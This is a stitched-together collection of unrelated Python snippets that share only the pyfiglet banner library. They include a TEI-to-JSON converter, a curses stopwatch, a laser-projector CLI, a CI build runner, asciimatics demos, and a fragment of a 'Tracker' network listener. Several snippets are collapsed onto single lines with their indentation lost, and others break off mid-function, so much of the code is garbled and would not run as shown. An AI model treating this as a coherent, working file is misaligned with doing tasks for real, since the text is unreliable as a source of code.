def main():
    """Parse TEI and CTS XML files from an input directory and write a
    merged CSV and JSON file under output/<inputdir>.

    Side effects: prints progress banners/messages and creates
    ``output/<inputdir>.csv`` and ``output/<inputdir>.json``.
    """
    parser = set_up_argparser()
    args = parser.parse_args()
    # The input directory name doubles as the output file basename.
    outputname = str(args.inputdir)

    # Generate lists of TEI / CTS XML file paths in the given input directory
    teis = all_teis(args.inputdir)
    cts = all_cts(args.inputdir)

    f = Figlet(font='slant')
    print(f.renderText('TEI 2 JSON'))

    # Parse TEI and CTS XML in parallel worker processes.  One pool is
    # enough for both jobs (the original created a second, never-closed
    # pool for the CTS pass).
    with Pool() as pool:
        print(Fore.CYAN + "✓ Starting TEI parsing" + Style.RESET_ALL)
        csv_entries_tei = pool.map(tei_to_csv_entry, teis)
        print(Fore.GREEN + "✓ Completed TEI parsing" + Style.RESET_ALL)

        # Colour fixed to CYAN for consistency with the other "Starting"
        # messages (was GREEN).
        print(Fore.CYAN + "✓ Starting CTS parsing" + Style.RESET_ALL)
        csv_entries_cts = pool.map(cts_to_csv_entry, cts)
        print(Fore.GREEN + "✓ Completed CTS metadata parsing" + Style.RESET_ALL)

    # Create Pandas dataframe with TEI list data
    df_tei = pd.DataFrame(csv_entries_tei, columns=[
        'filename', 'filepath', 'PTA', 'CPG', 'BHGn', 'aldama', 'pinakes',
        'date', 'title', 'text', 'licence', 'revision_date', 'revision_author'
    ])
    print(Fore.CYAN + "✓ Created Pandas dataframe for TEI data" + Style.RESET_ALL)

    # Create Pandas dataframe with CTS list data
    df_cts = pd.DataFrame(csv_entries_cts, columns=['filepath', 'urn', 'textgroup'])
    print(Fore.CYAN + "✓ Created Pandas dataframe for CTS metadata" + Style.RESET_ALL)

    # Merge TEI and CTS dataframes on their shared columns.  If the merge
    # fails there is nothing to write, so bail out instead of crashing on
    # an undefined df_results below (the original bare except fell through).
    try:
        df_results = pd.merge(df_tei, df_cts)
    except Exception:
        print(Fore.RED + "Error merging TEI and CTS dataframes" + Style.RESET_ALL)
        return

    # Generate CSV from the merged data
    try:
        df_results.to_csv("output/%s.csv" % outputname, index=False)
    except OSError:
        print(Fore.RED + "Error creating CSV output file" + Style.RESET_ALL)
    else:
        print(
            Fore.CYAN + "✓ Generated output CSV file: 'output/%s.csv'" % outputname,
            Style.RESET_ALL)

    # Generate JSON from the merged data.  `json_data` avoids shadowing the
    # stdlib `json` module name; `with` guarantees the file handle is closed.
    try:
        json_data = df_results.to_json(orient='index')
        with open("output/%s.json" % outputname, "w") as json_file:
            json_file.write(json_data)
    except OSError:
        print(Fore.RED + "Error creating JSON output file" + Style.RESET_ALL)
    else:
        print(Fore.CYAN + "✓ Generated output JSON file: 'output/%s.json'" % outputname + Style.RESET_ALL)
import socket import pyfiglet import os import sys import nmap import time from pyfiglet import Figlet from datetime import datetime from urllib import request as urlrequests custom_fig = Figlet(font='graffiti') ascii_banner = pyfiglet.figlet_format("Tracker") print(ascii_banner) print("=================================By-547y4m") def tracker(): soc = socket.socket() Sc = nmap.PortScanner() print("[$]----Session started---->") ip = input("[?]Enter your I.P to Listen on: ") try: host = ip port = 80 soc.bind((host, 80)) print("[+] Listening on " + ip + "....") except: sys.exit("[!]I.P Busy or any other network issue")
from pyfiglet import Figlet custom_fig = Figlet(font='starwars') print(custom_fig.renderText('HACKING NASA'))
def stopwatch(stdscr, alt_format=False, critical=3, exec_cmd=None,
              font=DEFAULT_FONT, no_figlet=False, no_seconds=False,
              quit_after=None, title=None, outfile=None,
              no_window_title=False, time=False, time_format=None,
              voice_prefix=None, **kwargs):
    """Run an interactive full-screen stopwatch inside a curses window.

    Counts up from zero, redrawing once per second, until the user exits
    (or ``quit_after`` seconds elapse).  A background thread feeds key
    presses into ``input_queue``; pause, reset, +10s and lap actions are
    handled in the main loop.

    Args:
        stdscr: curses window to draw into.
        alt_format: use the alternate seconds formatting.
        critical: threshold (seconds) below which announcements are bare digits.
        exec_cmd: shell command template run every tick, formatted with
            (seconds_elapsed, annunciation).
        font: figlet font name for the big digits.
        no_figlet / no_seconds: plain-text rendering / hide seconds.
        quit_after: stop automatically after this many seconds.
        title: optional title text (figlet-rendered unless no_figlet).
        outfile: if set, current display text and elapsed seconds are
            written to this file every tick (removed on exit).
        no_window_title: skip updating the terminal window title.
        time / time_format: show wall-clock time instead of elapsed seconds.
        voice_prefix: prefix inserted into spoken/executed announcements.

    Returns:
        (total_elapsed_seconds, laps) where laps is a list of lap durations
        in seconds.
    """
    curses_lock, input_queue, quit_event = setup(stdscr)
    figlet = Figlet(font=font)
    if title and not no_figlet:
        try:
            title = figlet.renderText(title)
        except CharNotPrinted:
            # Title contains characters the font can't render; drop it.
            title = ""
    # Key-press reader runs in a daemon-style worker thread.
    input_thread = Thread(
        args=(stdscr, input_queue, quit_event, curses_lock),
        target=input_thread_body,
    )
    input_thread.start()
    try:
        sync_start = datetime.now()   # reference point for elapsed time
        pause_start = None            # set while paused
        seconds_elapsed = 0
        laps = []
        while quit_after is None or seconds_elapsed < int(quit_after):
            # Re-read terminal width every tick so resizes take effect.
            figlet.width = stdscr.getmaxyx()[1]
            if time:
                stopwatch_text = datetime.now().strftime(time_format)
            elif alt_format:
                stopwatch_text = format_seconds_alt(
                    seconds_elapsed, 0, hide_seconds=no_seconds)
            else:
                stopwatch_text = format_seconds(
                    seconds_elapsed, hide_seconds=no_seconds)
            with curses_lock:
                if not no_window_title:
                    # OSC 2 escape sequence: set the terminal window title.
                    os.write(stdout.fileno(),
                             "\033]2;{0}\007".format(stopwatch_text).encode())
                if outfile:
                    with open(outfile, 'w') as f:
                        f.write("{}\n{}\n".format(stopwatch_text,
                                                  seconds_elapsed))
                stdscr.erase()
                try:
                    draw_text(
                        stdscr,
                        stopwatch_text if no_figlet
                        else figlet.renderText(stopwatch_text),
                        fallback=stopwatch_text,
                        title=title,
                    )
                except CharNotPrinted:
                    # Terminal too small / unprintable char: draw sentinel.
                    draw_text(stdscr, "E")
            if exec_cmd:
                voice_prefix = voice_prefix or ""
                # Build the announcement string for "round" elapsed values.
                annunciation = ""
                if seconds_elapsed <= critical and seconds_elapsed > 0:
                    annunciation = str(seconds_elapsed)
                elif seconds_elapsed in (5, 10, 20, 30, 40, 50, 60):
                    annunciation = "{} {} seconds".format(
                        voice_prefix, seconds_elapsed)
                elif seconds_elapsed in (120, 180, 300, 600, 1800):
                    annunciation = "{} {} minutes".format(
                        voice_prefix, int(seconds_elapsed / 60))
                elif seconds_elapsed == 3600:
                    annunciation = "{} one hour".format(voice_prefix)
                elif seconds_elapsed % 3600 == 0 and seconds_elapsed > 0:
                    annunciation = "{} {} hours".format(
                        voice_prefix, int(seconds_elapsed / 3600))
                # Fire-and-forget; output is discarded.
                Popen(
                    exec_cmd.format(seconds_elapsed, annunciation),
                    stdout=DEVNULL,
                    stderr=STDOUT,
                    shell=True,
                )
            # Sleep until the next whole-second boundary relative to
            # sync_start (keeps the display from drifting).
            sleep_target = sync_start + timedelta(seconds=seconds_elapsed + 1)
            if time:
                sleep_target = sleep_target.replace(microsecond=0)
            now = datetime.now()
            if sleep_target > now:
                try:
                    # Block for the remainder of the tick, waking early on input.
                    input_action = input_queue.get(
                        True, (sleep_target - now).total_seconds())
                except Empty:
                    input_action = None
                if input_action == INPUT_PAUSE:
                    pause_start = datetime.now()
                    # Redraw in the "paused" colour, then block until the
                    # next key press.
                    with curses_lock:
                        if not no_window_title:
                            os.write(
                                stdout.fileno(),
                                "\033]2;{0}\007".format(
                                    stopwatch_text).encode())
                        if outfile:
                            with open(outfile, 'w') as f:
                                f.write("{}\n{}\n".format(
                                    stopwatch_text, seconds_elapsed))
                        stdscr.erase()
                        try:
                            draw_text(
                                stdscr,
                                stopwatch_text if no_figlet
                                else figlet.renderText(stopwatch_text),
                                color=3,
                                fallback=stopwatch_text,
                                title=title,
                            )
                        except CharNotPrinted:
                            draw_text(stdscr, "E")
                    input_action = input_queue.get()
                    if input_action == INPUT_PAUSE:
                        # Unpaused: shift the reference point forward by the
                        # paused duration so elapsed time excludes the pause.
                        sync_start += (datetime.now() - pause_start)
                        pause_start = None
                if input_action == INPUT_EXIT:  # no elif here! input_action may have changed
                    if pause_start:
                        sync_start += (datetime.now() - pause_start)
                        pause_start = None
                    break
                elif input_action == INPUT_RESET:
                    sync_start = datetime.now()
                    laps = []
                    seconds_elapsed = 0
                elif input_action == INPUT_PLUS:
                    # Add 10 seconds by moving the reference point back.
                    sync_start -= timedelta(seconds=10)
                elif input_action == INPUT_LAP:
                    if pause_start:
                        sync_start += (datetime.now() - pause_start)
                        pause_start = None
                    # Record the lap and restart the count from zero.
                    laps.append((datetime.now() - sync_start).total_seconds())
                    sync_start = datetime.now()
                    seconds_elapsed = 0
            seconds_elapsed = int(
                (datetime.now() - sync_start).total_seconds())
    finally:
        # Always restore the window title, clean up the outfile, and shut
        # down the input thread — even on exceptions.
        with curses_lock:
            if not no_window_title:
                os.write(stdout.fileno(), "\033]2;\007".encode())
            if outfile:
                os.remove(outfile)
        quit_event.set()
        input_thread.join()
    return (datetime.now() - sync_start).total_seconds(), laps
}, { 'name': 'Exit Program' }] } strategy_answer = prompt(strategy_questions) if strategy_answer.get( 'strategy_type') == 'Vigilant Asset Allocation (VAA)': vaa = VAA() decision = vaa.decision() print_output(decision) elif strategy_answer.get( 'strategy_type') == 'Lethargic Asset Allocation (LAA)': print_output(LAA.decision()) elif strategy_answer.get('strategy_type') == 'Go to Main Menu': break elif strategy_answer.get('strategy_type') == 'Exit Program': quit() main_menu() if __name__ == "__main__": os.system("clear") fig = Figlet(font='slant') print(fig.renderText("PyQuant")) main_menu()
from pyfiglet import Figlet import os from flask import Flask, jsonify from flask_restful import Resource, Api app = Flask(__name__) api = Api(app) font = Figlet(font="starwars") class CreateUser(Resource): def get(self): return {'status': 'success'} api.add_resource(CreateUser, '/user') @app.route("/") def main(): # get the message from the environmental variable $MESSAGE # or fall back to the string "no message specified" message = os.getenv("MESSAGE", "no message specified") # render plain text nicely in HTML html_text = font.renderText(message)\ .replace(" "," ")\ .replace(">",">")\ .replace("<","<")\ .replace("\n","<br>") # use a monospace font so everything lines up as expected
_ = system('clear') # Styles style = style_from_dict({ Token.Separator: '#cc5454', Token.QuestionMark: '#673ab7 bold', Token.Selected: '#cc5454', # default Token.Pointer: '#673ab7 bold', Token.Instruction: '', # default Token.Answer: '#f44336 bold', Token.Question: 'bold #673ab7', }) # Titulo title = Figlet(font='slant') # Actions main_menu_actions = [ "Use a especific address", "Use a excel or a csv file", ] excel_files = glob.glob('*.xlsx') csv_files = glob.glob('*.csv') # Menu main_menu = [{ "type": "list", "message": "Menu", "name": "action", "choices": main_menu_actions + [Separator(), "Cerrar"] }] # Address
if isinstance(obj, np.integer): return int(obj) elif isinstance(obj, np.floating): return float(obj) elif isinstance(obj, np.ndarray): return obj.tolist() else: return super(NpEncoder, self).default(obj) def read_yaml(filename): ''' take filename as parameter and convert yaml to ordereddict ''' return yaml.load(open(filename)) custom_fig = Figlet(font='slant') click.echo(custom_fig.renderText('cognito')) @click.group(cls=DefaultGroup, default='--help', default_if_no_args=True, invoke_without_command=True) @click.option('--version', '-v', is_flag=True, default=False) def cli(version): ''' Generate ML consumable datasets using advanced data preprocessing and data wrangling. USAGE: \n $ cognito prepare -m ml --input filepath --out filepath
import time from pyfiglet import Figlet from getpass import getpass import new_token fig_type = Figlet(font='graffiti') print(fig_type.renderText('Token Manager')) # Script Menu print('\n[1] New Token \n' '[2] Edit Token \n' '[3] Delete Token \n' '[4] Exit\n\n\n') user_selection = input('[?] What Type Of Service Are You Looking For ? ') if user_selection == '1': print("Starting New Token Configurations ...") gather_token = new_token.get_token() elif user_selection == '2': print("Starting Tokens Data Edit Mode...") elif user_selection == '3': print("Fetching Tokens List and Data ...") exit() elif user_selection == '4': print("Exiting The Store ...") exit()
class ScALP(cmd.Cmd):
    """Interactive command shell for the ScALP laser projector on a
    Raspberry Pi.  Commands capture/process video frames with OpenCV and
    drive the galvo/laser over SPI (spi1/spi2)."""
    custom_fig = Figlet(font='slant')
    intro = 'Welcome to the ScALP CLI for Raspberry Pi \n'
    prompt = '> '
    file = None
    # Banner prints once, at class-definition time (side effect of the
    # class body, not of instantiation).
    print(custom_fig.renderText(' ScALP '))

    def do_background(self, arg):
        # Capture/record the background reference video.
        scalp_bg = bg.Background()
        scalp_bg.set_background()

    def do_frame(self, arg):
        # Capture/record a foreground frame video.
        scalp_fr = fr.Frame()
        scalp_fr.set_frame()

    def do_xy(self, arg):
        """ For each frame in background and foreground, subtract, Canny edge detection, find contours, get x-y """
        back = cv2.VideoCapture('./background_video.avi')
        fore = cv2.VideoCapture('./foreground_video.avi')
        back_frames = []
        fore_frames = []
        diff_frames = []
        # Read 60 frames from each video, converting to grayscale.
        for i in range(60):
            _, back_frame = back.read()
            _, fore_frame = fore.read()
            back_gray = cv2.cvtColor(back_frame, cv2.COLOR_BGR2GRAY)
            fore_gray = cv2.cvtColor(fore_frame, cv2.COLOR_BGR2GRAY)
            back_frames.append(back_gray)
            fore_frames.append(fore_gray)
        # Per-pixel absolute grayscale difference, binarised at this
        # threshold; assumes 720x1280 frames (hard-coded below).
        threshold = 40
        for i in range(0, 5):
            print("frame: " + str(i))
            f_frame = fore_frames[i]
            b_frame = back_frames[i]
            diff_frame = np.zeros(shape=(720, 1280))
            for x in range(0, 720):
                for y in range(0, 1280):
                    pixel = int(f_frame[x, y]) - int(b_frame[x, y])
                    if abs(pixel) > threshold:
                        diff_frame[x, y] = 1
            diff_frames.append(diff_frame)
        # NOTE(review): avg_img is computed but never used.
        avg_img = np.mean(diff_frames, axis=0)
        # Connected-component labelling of the last diff mask
        # (8-connectivity via the 3x3 structuring element).
        labeled_image, nb_labels = ndimage.label(diff_frames[-1],
                                                 structure=np.ones((3, 3)))
        sizes = ndimage.sum(diff_frames[-1], labeled_image,
                            range(nb_labels + 1))
        sizes = list(sizes)
        # Pick the label of the largest component.
        main_label = max(sizes)
        res_list = [i for i, value in enumerate(sizes) if value == main_label]
        main_label = res_list[0]
        # Keep only the largest component, as a 0/255 mask.
        for x in range(0, 720):
            for y in range(0, 1280):
                if labeled_image[x, y] != main_label:
                    labeled_image[x, y] = 0
                else:
                    labeled_image[x, y] = 255
        cv2.imwrite('./labels.jpg', labeled_image)
        # Fill interior holes and save the binary silhouette.
        image_bw = ndimage.binary_fill_holes(labeled_image).astype(int)
        cv2.imwrite('./label_bw_filled_in.jpg', image_bw)
        # while True:
        #     cv2.imshow('Gray image', diff_frames[-1])
        #     k = cv2.waitKey(33)
        #     if k==27:  # Esc key to stop
        #         break
        cv2.destroyAllWindows()

    def do_xyRGB(self, arg):
        """ Similar to do_xy but looks at whole RGB """
        back = cv2.VideoCapture('./background_video.avi')
        fore = cv2.VideoCapture('./foreground_video.avi')
        back_frames = []
        fore_frames = []
        diff_frames = []
        # Keep full-colour frames (no grayscale conversion here).
        for i in range(60):
            _, back_frame = back.read()
            _, fore_frame = fore.read()
            back_frames.append(back_frame)
            fore_frames.append(fore_frame)
        # Threshold applied to the summed per-channel absolute differences.
        threshold = 110
        for i in range(0, 5):
            print("frame: " + str(i))
            f_frame = fore_frames[i]
            b_frame = back_frames[i]
            diff_frame = np.zeros(shape=(720, 1280))
            for x in range(0, 720):
                for y in range(0, 1280):
                    red_pixel = abs(
                        int(f_frame[x, y][0]) - int(b_frame[x, y][0]))
                    green_pixel = abs(
                        int(f_frame[x, y][1]) - int(b_frame[x, y][1]))
                    blue_pixel = abs(
                        int(f_frame[x, y][2]) - int(b_frame[x, y][2]))
                    pixel_diff = red_pixel + green_pixel + blue_pixel
                    if abs(pixel_diff) > threshold:
                        diff_frame[x, y] = 255
            diff_frames.append(diff_frame)
        cv2.imwrite('./diff_frame.jpg', diff_frames[0])
        # Largest-connected-component extraction, as in do_xy.
        labeled_image, nb_labels = ndimage.label(diff_frames[-1],
                                                 structure=np.ones((3, 3)))
        sizes = ndimage.sum(diff_frames[-1], labeled_image,
                            range(nb_labels + 1))
        sizes = list(sizes)
        main_label = max(sizes)
        res_list = [i for i, value in enumerate(sizes) if value == main_label]
        main_label = res_list[0]
        for x in range(0, 720):
            for y in range(0, 1280):
                if labeled_image[x, y] != main_label:
                    labeled_image[x, y] = 0
                else:
                    labeled_image[x, y] = 255
        cv2.imwrite('./labels_RGB.jpg', labeled_image)
        image_bw = ndimage.binary_fill_holes(labeled_image).astype(int)
        cv2.imwrite('./label_bw_filled_in_RGB.jpg', image_bw)
        cv2.destroyAllWindows()

    def do_drivexy(self, arg):
        """ Drives the digital signal to send the laser to a specific point. Can be called <=800 times a second. Uses a list of x and y points. """
        # Sweep a value up then back down, writing each 16-bit word to both
        # SPI devices as two bytes (high byte first).  The +4096 looks like
        # a DAC command/channel prefix — TODO confirm against the DAC
        # datasheet.
        for i in range(100, 4000, 100):
            val = int(i) + 4096
            binary_val = f"{val:016b}"
            hex1 = hex(int(binary_val[0:8], 2))
            hex2 = hex(int(binary_val[8:16], 2))
            hex1 = int(hex1, 16)
            hex2 = int(hex2, 16)
            spi1.writebytes([hex1, hex2])
            spi2.writebytes([hex1, hex2])
            time.sleep(0.005)
        for i in range(4000, 100, -100):
            val = int(i) + 4096
            binary_val = f'{val:016b}'
            hex1 = hex(int(binary_val[0:8], 2))
            hex2 = hex(int(binary_val[8:16], 2))
            hex1 = int(hex1, 16)
            hex2 = int(hex2, 16)
            spi1.writebytes([hex1, hex2])
            spi2.writebytes([hex1, hex2])
            time.sleep(0.005)

    def do_circle(self, arg):
        """ Drives motor to make a circle """
        # Sample 100 points around a circle whose centre/radius come from
        # user input, then stream them to the SPI DAC forever (no exit
        # condition — Ctrl-C to stop).
        points = 100
        angles = np.linspace(0, 2 * 3.14159, points)
        input_x = input("Provide center x (int): ")
        input_y = input("Provide center y (int): ")
        x = float(input_x)
        y = float(input_y)
        input_radius = input("Provide radius (int less than 1000): ")
        angles = [float(i) for i in list(angles)]
        input_radius = float(input_radius)
        x = [round(input_radius * np.cos(angle)) + x for angle in angles]
        y = [round(input_radius * np.sin(angle)) + y for angle in angles]
        while True:
            # `point` is unused; the index drives both coordinate lists.
            for count, point in enumerate(x, 0):
                # X channel: offset +4096; split into two bytes for SPI.
                x_val = int(x[count]) + 4096
                x_b_val = f'{x_val:016b}'
                hex1 = hex(int(x_b_val[0:8], 2))
                hex2 = hex(int(x_b_val[8:16], 2))
                hex1 = int(hex1, 16)
                hex2 = int(hex2, 16)
                spi1.writebytes([hex1, hex2])
                # Y channel: offset +36864 (different DAC channel prefix —
                # TODO confirm).
                y_val = int(y[count]) + 36864
                y_b_val = f'{y_val:016b}'
                hex1 = hex(int(y_b_val[0:8], 2))
                hex2 = hex(int(y_b_val[8:16], 2))
                hex1 = int(hex1, 16)
                hex2 = int(hex2, 16)
                spi1.writebytes([hex1, hex2])

    def do_information(self, arg):
        """ Get info on an image """
        frame = cv2.imread('./whitestar.jpg', cv2.IMREAD_GRAYSCALE)
        scale_percent = 30  # percent of original size
        width = int(frame.shape[1] * scale_percent / 100)
        height = int(frame.shape[0] * scale_percent / 100)
        dim = (width, height)
        frame = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)
        contours = cv2.findContours(frame, cv2.RETR_TREE,
                                    cv2.CHAIN_APPROX_SIMPLE)
        print(type(contours[1]))
        points = np.vstack(contours[1])  #
        print(points)
        print(points[0])
        print("Number of Contours found = " + str(len(contours)))
        # cv2.drawContours(frame, contours[0], -1, (0, 255, 0), 3)
        # cv2.imshow('Contours', contours[0])
        # cv2.waitKey(0)
        # x = [float(i[0][0])*2 for i in points]
        # y = [float(i[0][1])*2 for i in points]
        # Hard-coded rectangular test path (the contour-derived points
        # above are commented out).
        x = list(range(0, 1000, 100)) + [1000] * 10 + list(range(
            1000, 0, -100)) + [0] * 10
        y = [0] * 10 + list(range(0, 1000, 100)) + [1000] * 10 + list(
            range(1000, 0, -100))
        print(x)
        print(y)
        cv2.destroyAllWindows()
        # Stream the path to the DAC forever (same two-byte SPI protocol
        # as do_circle).
        while True:
            for count, point in enumerate(x, 0):
                x_val = int(x[count]) + 4096
                x_b_val = f'{x_val:016b}'
                hex1 = hex(int(x_b_val[0:8], 2))
                hex2 = hex(int(x_b_val[8:16], 2))
                hex1 = int(hex1, 16)
                hex2 = int(hex2, 16)
                spi1.writebytes([hex1, hex2])
                y_val = int(y[count]) + 36864
                y_b_val = f'{y_val:016b}'
                hex1 = hex(int(y_b_val[0:8], 2))
                hex2 = hex(int(y_b_val[8:16], 2))
                hex1 = int(hex1, 16)
                hex2 = int(hex2, 16)
                spi1.writebytes([hex1, hex2])

    def do_image(self, arg):
        """ reads image, creates point list """
        img = cv2.imread("./whitestar.jpg", cv2.IMREAD_UNCHANGED)
        img_grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        cv2.imshow("example", img_grey)
        # Binarise, then extract contours from the thresholded image.
        thresh = 100
        ret, thresh_img = cv2.threshold(img_grey, thresh, 255,
                                        cv2.THRESH_BINARY)
        contours = cv2.findContours(thresh_img, cv2.RETR_TREE,
                                    cv2.CHAIN_APPROX_SIMPLE)
        img_contours = np.zeros(img.shape)
        contour_points = contours[1]
        #cv2.drawContours(img_contours, contours[1], -1, (0,255,0), 3)
        #cv2.imwrite("./contours.png", img_contours)
        # Now find equally spaced points along contours[1]
        xs = []
        ys = []
        print(contour_points)
        print(contour_points[0])
        for i in contour_points[0]:
            xs.append(i[0][0])
            ys.append(i[0][1])
        plt.figure(0)
        plt.scatter(ys, xs)
        plt.show()
        plt.close()
        # closed contour from xc to yc
        xc = xs + [xs[0]]
        yc = ys + [ys[0]]
        # find spacing between points
        dx = np.diff(xc)
        dy = np.diff(yc)
        dS = np.sqrt(dx * dx + dy * dy)
        print(dS)
        dS = [0] + list(dS)
        # Cumulative arc length; resample N equally spaced points along it.
        d = np.cumsum(dS)
        perimeter = d[-1]
        N = 50
        ds = perimeter / N
        dSi = [ds * i for i in range(0, N)]
        xi = np.interp(dSi, d, xc)
        yi = np.interp(dSi, d, yc)
        plt.figure(1)
        plt.scatter(yi, xi)
        plt.show()
        plt.close()
        # Scale up 3x for the DAC range — TODO confirm scaling factor.
        x = [i * 3 for i in xi]
        y = [j * 3 for j in yi]
        # Stream the resampled outline to the DAC forever.
        while True:
            for count, point in enumerate(x, 0):
                x_val = int(x[count]) + 4096
                x_b_val = f'{x_val:016b}'
                hex1 = hex(int(x_b_val[0:8], 2))
                hex2 = hex(int(x_b_val[8:16], 2))
                hex1 = int(hex1, 16)
                hex2 = int(hex2, 16)
                spi1.writebytes([hex1, hex2])
                y_val = int(y[count]) + 36864
                y_b_val = f'{y_val:016b}'
                hex1 = hex(int(y_b_val[0:8], 2))
                hex2 = hex(int(y_b_val[8:16], 2))
                hex1 = int(hex1, 16)
                hex2 = int(hex2, 16)
                spi1.writebytes([hex1, hex2])
        pass

    def do_colorpick(self, arg):
        """ Drives the digital signal to achieve the correct RGB color on the white laser """
        # Not implemented yet.
        pass

    def do_threshold(self, arg):
        """ Test thresholding to determine outline points """
        # Not implemented yet.
        pass

    def do_message(self, arg):
        # Fetch/display a message via the ms.Message helper.
        scalp_ms = ms.Message()
        scalp_ms.get_message()

    def do_bye(self, arg):
        """ Stop command line interface """
        print('thanks for using scalp')
        self.close()
        # Returning True tells cmd.Cmd to stop the command loop.
        return True

    def close(self):
        # Release the output file handle, if one was opened.
        if self.file:
            self.file.close()
            self.file = None
def start_build():
    """Run the requested CI pipeline end to end.

    Clones the repository named by the global CLI ``args`` (populated by
    define_cli_args()) into a temporary directory, parses its pipeline
    manifest, checks out the build branch, and executes each task of the
    selected pipeline in a shell inside the clone.

    Raises:
        ValueError: if the pipeline name or any of its tasks is invalid,
            or a task command exits with a non-zero status.
    """
    f = Figlet(font='standard')
    print(f.renderText("BuildIt4me!"))
    define_cli_args()
    if args.debug:
        print("*** DEBUG MODE ***")
    print(f"-> Pipeline '{ args.pipeline_name }' has started!")
    try:
        # The temp directory for the cloned repo is only kept inside the below "with" scope
        with tempfile.TemporaryDirectory() as tmpdirname:
            print('-> Creating temporary directory', tmpdirname)
            print("-> Checking out from SCM")
            print(
                f"-> Cloning { args.git_repo } into temp dir '{ tmpdirname }'")
            # get the instance of the git object while cloning the remote repo
            # https://gitpython.readthedocs.io/en/stable/reference.html#module-git.remote
            git_repo = Repo.clone_from(args.git_repo,
                                       tmpdirname,
                                       branch='master',
                                       progress=CloneProgress())
            # Parse the manifest ONCE and reuse it — the original re-read
            # and re-parsed the same YAML file three times.
            manifest = parse_and_return_pipeline_yaml(tmpdirname)
            # branch the build should run from
            build_branch = manifest["branch"]
            # tasks and pipelines defined in the manifest
            tasks = manifest["tasks"]
            pipelines = manifest["pipelines"]
            # in debug mode, print the parsed data structures
            if args.debug:
                print("[DEBUG] - Tasks Data Structure:", tasks)
                print("[DEBUG] - Pipelines Data Structure:", pipelines)
            print("\nBuild from branch:", build_branch)
            # check out the local git branch the build runs on
            git_repo.git.checkout(build_branch)
            # checks if the provided pipeline is valid
            if is_valid_pipeline(args.pipeline_name, pipelines):
                # pipelines is a list of {'pipeline_name': ['task1', ...]}
                for pipeline_dict in pipelines:
                    for pipeline_key, pipeline_value in pipeline_dict.items():
                        if pipeline_key != args.pipeline_name:
                            continue
                        # run every task of the selected pipeline in order
                        for pipeline_task in pipeline_value:
                            print(f"\n*** { pipeline_task.capitalize() } ***")
                            if is_valid_task(pipeline_task, tasks):
                                task_cmd = return_task_cmd(pipeline_task, tasks)
                                print(" CMD:", task_cmd)
                                # run the task command in a shell, inside the clone
                                cmd_call = subprocess.call(task_cmd,
                                                           shell=True,
                                                           cwd=tmpdirname)
                                # non-zero exit code aborts the build
                                if cmd_call:
                                    raise ValueError(
                                        "Provided CMD doesn't work. Subprocess returned with error",
                                        cmd_call)
                            else:
                                raise ValueError(
                                    f"The task '{ pipeline_task }' doesn't seem to be a valid task. Check your pipeline manifest and try again."
                                )
            else:
                raise ValueError(
                    f"'{ args.pipeline_name }' doesn't seem to be a valid pipeline. Check your pipeline manifest and try again."
                )
            # the temp dir is removed automatically at the end of the 'with' block
            print("\n-> Post run housekeeping: Removing temporary directory",
                  tmpdirname)
            print("\nThe pipeline finished without any errors!\n")
    except OSError as err:
        print("Couldn't create temporary directory in local file system:", err)
        print("Error code:", err.errno)
def demo(screen): scenes = [] effects = [ Print(screen, Fire(screen.height, 80, "*" * 70, 0.8, 60, screen.colours, bg=screen.colours >= 256), 0, speed=1, transparent=False), Print(screen, FigletText("PYTHON", "banner3"), (screen.height - 4) // 2, colour=Screen.COLOUR_BLACK, speed=1, stop_frame=30), Print(screen, FigletText("ROCKS", "banner3"), (screen.height - 4) // 2, colour=Screen.COLOUR_BLACK, speed=1, start_frame=30, stop_frame=50), Print(screen, FigletText("!!!", "banner3"), (screen.height - 4) // 2, colour=Screen.COLOUR_BLACK, speed=1, start_frame=50, stop_frame=70), Print(screen, FigletText("!!!", "banner3"), (screen.height - 4) // 2, colour=Screen.COLOUR_BLACK, speed=1, start_frame=70), ] scenes.append(Scene(effects, 100)) text = Figlet(font="banner", width=200).renderText("ASCIIMATICS") width = max([len(x) for x in text.split("\n")]) effects = [ Print(screen, Fire(screen.height, 80, text, 0.4, 40, screen.colours), 0, speed=1, transparent=False), Print(screen, FigletText("ASCIIMATICS", "banner"), screen.height - 9, x=(screen.width - width) // 2 + 1, colour=Screen.COLOUR_BLACK, bg=Screen.COLOUR_BLACK, speed=1), Print(screen, FigletText("ASCIIMATICS", "banner"), screen.height - 9, colour=Screen.COLOUR_WHITE, bg=Screen.COLOUR_WHITE, speed=1), ] scenes.append(Scene(effects, -1)) screen.play(scenes, stop_on_resize=True)
def _credits(screen):
    """Play the asciimatics credit roll until the window is resized."""
    banner = Figlet(font="banner", width=200).renderText("ASCIIMATICS")
    banner_width = max(len(row) for row in banner.split("\n"))

    def rolling(lines):
        # Scene: credit lines scroll up the screen, one FigletText every
        # 8 rows; the duration matches the original hand-computed values.
        effects = [Scroll(screen, 3)]
        row = screen.height
        for line in lines:
            effects.append(
                Mirage(screen, FigletText(line), row, Screen.COLOUR_GREEN))
            row += 8
        return Scene(effects, row * 3)

    scenes = []
    # Burning ASCIIMATICS banner with black mask + white overlay copies.
    scenes.append(Scene([
        Print(screen,
              Fire(screen.height, 80, banner, 0.4, 40, screen.colours),
              0, speed=1, transparent=False),
        Print(screen, FigletText("ASCIIMATICS", "banner"), screen.height - 9,
              x=(screen.width - banner_width) // 2 + 1,
              colour=Screen.COLOUR_BLACK, bg=Screen.COLOUR_BLACK, speed=1),
        Print(screen, FigletText("ASCIIMATICS", "banner"), screen.height - 9,
              colour=Screen.COLOUR_WHITE, bg=Screen.COLOUR_WHITE, speed=1),
    ], 100))
    # Matrix rain revealing the project name, wiped and cycled.
    scenes.append(Scene([
        Matrix(screen, stop_frame=200),
        Mirage(screen, FigletText("Asciimatics"), screen.height // 2 - 3,
               Screen.COLOUR_GREEN, start_frame=100, stop_frame=200),
        Wipe(screen, start_frame=150),
        Cycle(screen, FigletText("Asciimatics"), screen.height // 2 - 3,
              start_frame=200),
    ], 250, clear=False))
    # Rainbow tagline banner.
    scenes.append(Scene([
        BannerText(
            screen,
            Rainbow(screen,
                    FigletText("Reliving the 80s in glorious ASCII text...",
                               font='slant')),
            screen.height // 2 - 3, Screen.COLOUR_GREEN),
    ]))
    # Scrolling author and contributor credits.
    scenes.append(rolling(["Conceived and", "written by:", "Peter Brittain"]))
    scenes.append(rolling([
        "With help from:", "Cory Benfield", "Bryce Guinta", "Aman Orazaev",
        "Daniel Kerr", "Dylan Janeke", "ianadeem", "Scott Mudge",
        "Luke Murphy", "mronkain", "Dougal Sutherland", "Kirtan Sakariya",
